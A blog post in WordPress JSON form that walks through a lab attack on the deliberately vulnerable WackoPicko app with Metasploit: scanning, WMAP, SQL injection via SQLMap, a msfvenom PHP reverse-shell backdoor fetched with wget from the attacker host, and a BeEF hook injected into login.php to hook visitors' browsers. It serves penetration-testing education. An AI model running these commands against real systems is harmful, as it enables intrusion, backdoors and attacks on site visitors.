{"id":4792,"date":"2025-09-11T09:00:33","date_gmt":"2025-09-11T09:00:33","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=4792"},"modified":"2025-09-11T09:00:33","modified_gmt":"2025-09-11T09:00:33","slug":"how-to-hack-a-website-with-metasploit","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=4792","title":{"rendered":"How to hack a website with Metasploit"},"content":{"rendered":"

Normally, a penetration tester or hacker uses Metasploit<\/strong> to exploit vulnerable services in a target server or to create a payload to set up a backdoor on a compromised system. Nevertheless, Metasploit has evolved with many plugins and modules, and now it can do much more than that. Today, it can also be used to pentest web applications<\/strong> effectively.<\/p>\n

In this article, I will show you how to use Metasploit for scanning a web server<\/strong> to gather information and how to use Metasploit for vulnerability assessment of a web application<\/strong>.<\/p>\n

Scenario<\/h2>\n

In this article, we will simulate an attack on a client using a vulnerable server. Below are the details of the setup:<\/p>\n

Attacker Machine<\/strong> \u2013 Backtrack 5 R3 \u2013 192.168.1.137<\/p>\n

Target Machine<\/strong> \u2013 WackoPicko web application (included in OWASP Broken Web Application v1.0<\/strong>) \u2013 192.168.1.138<\/p>\n

Scanning Phase<\/h2>\n

When attempting to hack a server, the first step is to gather as much information about the target as possible<\/strong>. Therefore, the first action is to scan the server.<\/p>\n

Metasploit includes a module called db_nmap<\/strong>, which runs Nmap<\/strong> (one of the most popular scanning tools). The results obtained from Nmap are automatically stored in Metasploit\u2019s database for later use.<\/p>\n

Follow these steps to perform the scan:<\/p>\n

Open the Metasploit console<\/strong> root@bt:\/# msfconsole<\/p>\n

Run db_nmap with the target\u2019s IP address<\/strong> <\/p>\n

msf > db_nmap [*] Usage: db_nmap [nmap options] <\/p>\n

\n<\/div>\n

This will execute Nmap from within Metasploit <\/a>and record the results in the database, making it easier to analyze the target during the penetration test. <\/p>\n

After running the initial db_nmap scan, we can proceed to analyze the results.<\/p>\n

1. Check Scanning Results with hosts<\/h3>\n

msf > hosts -h
\nmsf > hosts<\/p>\n

2. View Detailed Services with services<\/h3>\n

The services command provides details such as created_at, info, name, port, proto, state, updated_at<\/strong>.<\/p>\n

msf > services -h
\nmsf > services
\nmsf > services -c port,name,state<\/p>\n

From the results, we can confirm that the target server has a running web service<\/strong>.<\/p>\n

Discover: Mastering Metasploit: The Ultimate Cheat Sheet for Exploit Development, Post-Exploitation, and More<\/a><\/em><\/strong><\/p>\n

Crawling the Website<\/h2>\n

Metasploit also has a module to crawl websites<\/strong> and gather information.<\/p>\n

1. Select the Crawler Module<\/h3>\n

msf > use auxiliary\/scanner\/http\/crawler<\/p>\n

2. Set the Target (RHOST)<\/h3>\n

msf auxiliary(crawler) > set RHOST 192.168.77.138<\/p>\n

Since we are focusing on the WackoPicko web application<\/strong>, we specify its URI:<\/p>\n

msf auxiliary(crawler) > set URI \/WackoPicko\/<\/p>\n

3. Run the Crawler<\/h3>\n

msf auxiliary(crawler) > run<\/p>\n

From this phase, you will gather both server and web application information<\/strong>, which will be useful in the next phase\u2014Exploitation<\/strong>.<\/p>\n

Exploit Phase<\/h2>\n

In this phase, we will use Metasploit\u2019s vulnerability scanning modules<\/strong> and combine them with other attack tools.<\/p>\n

WMAP Plugin<\/h3>\n

WMAP<\/strong> is a general-purpose web application scanning framework<\/strong> for Metasploit 3. Its architecture is simple yet powerful. Unlike other scanners, WMAP is not built around a browser or spider for data capture\u2014it integrates directly into Metasploit.<\/p>\n

We will use WMAP to perform automated vulnerability scanning<\/strong>.<\/p>\n

Steps for WMAP Scanning<\/h3>\n

1. Load WMAP Modules<\/h4>\n

msf auxiliary(crawler) > load wmap<\/p>\n

2. List Web Application Sites<\/h4>\n

Since we already crawled the web application, WMAP <\/a>can use that information from the database.<\/p>\n

msf auxiliary(crawler) > wmap_sites
\nmsf auxiliary(crawler) > wmap_sites -l<\/p>\n

3. View Structure of Web Application<\/h4>\n

msf auxiliary(crawler) > wmap_sites -s [target_id]<\/p>\n

Example:<\/p>\n

msf auxiliary(crawler) > wmap_sites -s 0<\/p>\n

4. Specify Target for Scanning<\/h4>\n

msf auxiliary(crawler) > wmap_targets
\nmsf auxiliary(crawler) > wmap_targets -t<\/p>\n

5. Run Automated Vulnerability Scan<\/h4>\n

msf auxiliary(crawler) > wmap_run
\nmsf auxiliary(crawler) > wmap_run -e<\/p>\n

6. Check Vulnerability Scan Results<\/h4>\n

msf auxiliary(crawler) > wmap_vulns -l<\/p>\n

Results<\/h3>\n

From the scan results, we discover several vulnerabilities in the WackoPicko web application, such as:<\/p>\n

Sensitive files or directories<\/p>\n

Admin directory exposure<\/p>\n

Backup directory exposure<\/p>\n

SQL Injection vulnerabilities<\/strong><\/p>\n

These findings give penetration testers potential attack vectors to exploit further <\/p>\n

SQL Injection with Metasploit<\/h2>\n

If you want to test whether a parameter is vulnerable to SQL Injection, you can use Metasploit modules. In this example, we will use the auxiliary\/scanner\/http\/blind_sql_query<\/strong> module.<\/p>\n

Step 1: Identify the Vulnerable Page<\/h3>\n

From the WMAP scan, we discovered that:<\/p>\n

http:\/\/192.168.77.138\/WackoPicko\/users\/login.php<\/p>\n

has a SQL Injection vulnerability<\/strong> with two parameters: username and password.<\/p>\n

We will test the username parameter<\/strong> using the SQL Injection module.<\/p>\n

msf > use auxiliary\/scanner\/http\/blind_sql_query
\nmsf auxiliary(blind_sql_query) > show options<\/p>\n

Step 2: Configure the Target Environment<\/h3>\n

msf auxiliary(blind_sql_query) > set DATA username=hacker&password=password&submit=login
\nmsf auxiliary(blind_sql_query) > set METHOD POST
\nmsf auxiliary(blind_sql_query) > set PATH \/WackoPicko\/users\/login.php
\nmsf auxiliary(blind_sql_query) > set RHOSTS 192.168.77.138<\/p>\n

Step 3: Run the Test<\/h3>\n

msf auxiliary(blind_sql_query) > run<\/p>\n

The result shows that the username parameter is vulnerable to SQL Injection<\/strong>.<\/p>\n

You can also test other SQL Injection methods, such as Error-Based Injection<\/strong>, with:<\/p>\n

msf > use auxiliary\/scanner\/http\/error_sql_injection<\/p>\n

Exploiting the SQL Injection with SQLMap<\/h2>\n

Now that we know the username parameter of users\/login.php is vulnerable, we can exploit it using SQLMap<\/a><\/strong>, a powerful SQL Injection tool that works well with Metasploit.<\/p>\n

1. SQLMap Options We Will Use<\/h3>\n

-u \u2192 Target URL<\/p>\n

–data \u2192 Data string for POST request<\/p>\n

–random-agent \u2192 Use a random User-Agent header<\/p>\n

–os-shell \u2192 Attempt to gain an interactive OS shell<\/p>\n

2. Run SQLMap Command<\/h3>\n

root@bt:\/pentest\/database\/sqlmap# .\/sqlmap.py -u “http:\/\/192.168.77.138\/WackoPicko\/users\/login.php” –data “username=hacker&password=password&submit=login” –os-shell<\/p>\n

SQLMap Output (Summary):<\/strong><\/p>\n

Detected MySQL 5<\/strong> on Linux Ubuntu 10.04<\/strong><\/p>\n

Web tech: PHP 5.3.2, Apache 2.2.14<\/strong><\/p>\n

Injection points confirmed (username parameter)<\/p>\n

SQLMap attempted to upload a backdoor PHP shell into \/var\/www\/WackoPicko\/users\/<\/p>\n

Step 4: Creating a Backdoor with Metasploit (msfvenom)<\/h3>\n

Once inside, we can generate a reverse TCP backdoor<\/strong> with msfvenom:<\/p>\n

root@bt:~# msfvenom -p php\/meterpreter\/reverse_tcp LHOST=192.168.77.137 LPORT=443 -f raw > \/var\/www\/bd.php
\nroot@bt:~# mv \/var\/www\/bd.php \/var\/www\/bd.jpg<\/p>\n

Step 5: Upload Backdoor from Target Shell<\/h3>\n

Inside the SQLMap OS shell:<\/p>\n

os-shell> wget http:\/\/192.168.77.137\/bd.jpg
\nos-shell> mv bd.jpg bd.php<\/p>\n

Step 6: Start Metasploit Handler<\/h3>\n

Set up a handler to wait for the reverse shell connection:<\/p>\n

root@bt:~# msfcli multi\/handler PAYLOAD=php\/meterpreter\/reverse_tcp LHOST=192.168.77.137 LPORT=443 E<\/p>\n

Metasploit will start listening for incoming connections.<\/p>\n

Step 7: Trigger the Backdoor<\/h3>\n

Finally, execute the backdoor via browser:<\/p>\n

http:\/\/192.168.77.138\/WackoPicko\/users\/bd.php<\/p>\n

Metasploit console output:<\/p>\n

[*] Started reverse handler on 192.168.77.137:443
\n[*] Sending stage (39217 bytes) to 192.168.77.138
\n[*] Meterpreter session 1 opened (192.168.77.137:443 -> 192.168.77.138:42757)<\/p>\n

Now you have a Meterpreter session<\/strong> on the target machine, which gives you complete control. From here, you can upload files, escalate privileges, pivot to other systems, and much more.<\/p>\n

Metasploit with BeEF Plugin<\/h2>\n

The final part of this article demonstrates how to integrate Metasploit with BeEF (Browser Exploitation Framework)<\/strong>.<\/p>\n

So, what is BeEF?<\/a><\/p>\n

BeEF hooks one or more web browsers as beachheads for launching directed command modules. Each browser may exist in a different security context, and each context may provide a set of unique attack vectors.<\/strong><\/p>\n

By combining BeEF with Metasploit, penetration testers can exploit browser sessions of clients visiting a compromised page. <\/p>\n

Step 1: Run BeEF Service<\/h3>\n

root@bt:\/pentest\/web\/beef# .\/beef -x -v<\/p>\n

Step 2: Download BeEF Plugin for Metasploit<\/h3>\n

$ cd \/pentest\/exploits\/framework\/msf3
\n$ git clone https:\/\/github.com\/xntrik\/beefmetasploitplugin.git<\/p>\n

Output:<\/p>\n

Initialized empty Git repository in \/opt\/metasploit\/msf3\/beefmetasploitplugin\/.git\/<\/p>\n

Step 3: Move Plugin Files<\/h3>\n

root@bt:\/pentest\/exploits\/framework\/msf3# mv beefmetasploitplugin\/lib\/beef lib\/
\nroot@bt:\/pentest\/exploits\/framework\/msf3# mv beefmetasploitplugin\/plugins\/beef.rb plugins\/<\/p>\n

Step 4: Install Required Gems<\/h3>\n

root@bt:\/pentest\/exploits\/framework\/msf3# gem install hpricot json<\/p>\n

Step 5: Load BeEF Plugin in Metasploit<\/h3>\n

msf > load beef<\/p>\n

Step 6: Connect to BeEF<\/h3>\n

msf > beef_connect
\nmsf > beef_connect http:\/\/127.0.0.1:3000 beef beef<\/p>\n

Step 7: Inject BeEF Hook into Target Page<\/h3>\n

From the SQLMap exploitation phase, we already had a Meterpreter shell. Now, download the vulnerable login.php page, inject the BeEF hook, and re-upload it:<\/p>\n

meterpreter > download login.php .
\n[*] downloading: login.php -> .\/login.php
\n[*] downloaded : login.php -> .\/login.php<\/p>\n

root@bt:~# echo “<script src=’http:\/\/192.168.77.137:3000\/hook.js><\/script>” >> login.php<\/p>\n

meterpreter > upload login.php .
\n[*] uploading : login.php -> .
\n[*] uploaded : login.php -> .\/login.php<\/p>\n

Now, whenever a victim visits the login page, the BeEF hook will execute.<\/p>\n

Step 8: Access BeEF Management Interface<\/h3>\n

Open the BeEF control panel:<\/p>\n

http:\/\/127.0.0.1:3000\/ui\/panel<\/p>\n

Login credentials:<\/p>\n

Username<\/strong>: beef<\/p>\n

Password<\/strong>: beef<\/p>\n

Step 9: Monitor Victims<\/h3>\n

When a victim visits the infected login.php page, BeEF will detect it.<\/p>\n

Victims are listed in the left panel<\/strong>.<\/p>\n

Victim details appear in the right panel<\/strong> once selected.<\/p>\n

You can also monitor victims from Metasploit:<\/p>\n

msf > beef_online<\/p>\n

To see details of a victim:<\/p>\n

msf > beef_target
\nmsf > beef_target -i 0<\/p>\n

Step 10: Run BeEF Commands<\/h3>\n

To run BeEF modules against a victim:<\/p>\n

msf > beef_target -c 0<\/p>\n

For example, BeEF may launch a \u201cMan-In-The-Browser\u201d<\/strong> command against the hooked victim.<\/p>\n

Conclusion<\/h2>\n

Now you know that Metasploit can be used for much more than just exploiting servers<\/strong>. It can perform:<\/p>\n

Scanning<\/strong> with db_nmap<\/p>\n

Crawling and Vulnerability Assessment<\/strong> with WMAP<\/p>\n

SQL Injection Testing<\/strong> with Metasploit modules and SQLMap<\/p>\n

Client-Side Exploitation<\/strong> with the BeEF plugin<\/p>\n

However, Metasploit also has limitations<\/strong>:<\/p>\n

It cannot directly test all vulnerability types, such as Cross-Site Scripting (XSS)<\/strong> or Remote File Inclusion (RFI)<\/strong>.<\/p>\n

But it can integrate with tools like BeEF<\/strong> for client-side attacks, or generate payloads for RFI.<\/p>\n

In the future, Metasploit may expand to cover more vulnerabilities natively.<\/p>\n

If you are beginning in penetration testing<\/a>, Metasploit is the perfect starting point<\/strong> to learn about the attack surface of web applications and computer systems.<\/p>\n

The post How to hack a website with Metasploit<\/a> appeared first on Codelivly<\/a>.<\/p>","protected":false},"excerpt":{"rendered":"

Normally, a penetration tester or hacker uses Metasploit to exploit vulnerable services in a target server or to create a payload to set up a backdoor on a compromised system. Nevertheless, Metasploit has evolved with many plugins and modules, and now it can do much more than that. Today, it can also be used to […]<\/p>\n","protected":false},"author":0,"featured_media":4793,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-4792","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/4792"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4792"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/4792\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/4793"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4792"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}